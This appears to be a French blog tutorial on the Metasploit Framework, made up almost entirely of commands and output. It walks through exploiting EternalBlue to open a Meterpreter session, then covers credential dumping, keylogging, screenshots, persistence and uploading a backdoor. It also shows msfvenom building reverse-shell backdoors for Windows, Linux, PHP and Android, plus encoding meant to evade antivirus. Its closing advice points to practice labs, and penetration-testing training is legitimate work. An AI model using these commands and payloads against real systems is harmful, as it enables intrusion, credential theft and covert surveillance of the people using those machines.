Metasploit Framework
Metasploit est le framework de tests d'intrusion le plus utilisé au monde.
Démarrage
# Lancer msfconsole
msfconsole
# Bannière ASCII + chargement modules
Commandes de Base
# Rechercher exploits
msf6 > search ms17-010
# Utiliser un exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# Afficher options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
# Configurer
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.5
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Vérifier vulnérabilité
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
# Exploiter
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
Meterpreter
# Informations système
meterpreter > sysinfo
Computer : WIN-SERVER01
OS : Windows Server 2016
Architecture : x64
System Language : fr_FR
Meterpreter : x64/windows
# Utilisateur actuel
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
# Processus
meterpreter > ps
# Navigation fichiers
meterpreter > pwd
C:\Windows\system32
meterpreter > ls
meterpreter > cd C:\Users
meterpreter > download fichier.txt
meterpreter > upload backdoor.exe
# Réseau
meterpreter > ipconfig
meterpreter > route
meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.1.10
# Élévation privilèges
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
# Dump credentials
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > load kiwi
meterpreter > creds_all
# Persistance
meterpreter > run persistence -X -i 60 -p 4444 -r 192.168.1.5
# Capture écran
meterpreter > screenshot
# Keylogger
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
Génération Payloads
# Windows EXE
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > backdoor.exe
# Linux ELF
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f elf > backdoor.elf
# PHP Web Shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f raw > shell.php
# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -o backdoor.apk
# Encodé (contourner AV)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe
Multi-Handler
# Configurer listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.5
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j
# Session en arrière-plan
[*] Started reverse TCP handler on 192.168.1.5:4444
Scénario : Exploitation EternalBlue
# Étape 1 : Recherche
msf6 > search ms17-010
# Étape 2 : Configuration
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.5
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Étape 3 : Check
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[+] 192.168.1.10:445 - The target is vulnerable.
# Étape 4 : Exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Sending stage (200262 bytes) to 192.168.1.10
[*] Meterpreter session 1 opened
# Étape 5 : Post-exploitation
meterpreter > getsystem
meterpreter > hashdump
meterpreter > screenshot
Conclusion
Metasploit est essentiel pour les tests d'intrusion. Pratiquez sur Metasploitable2/3.
Chadow4
Commentaires (0)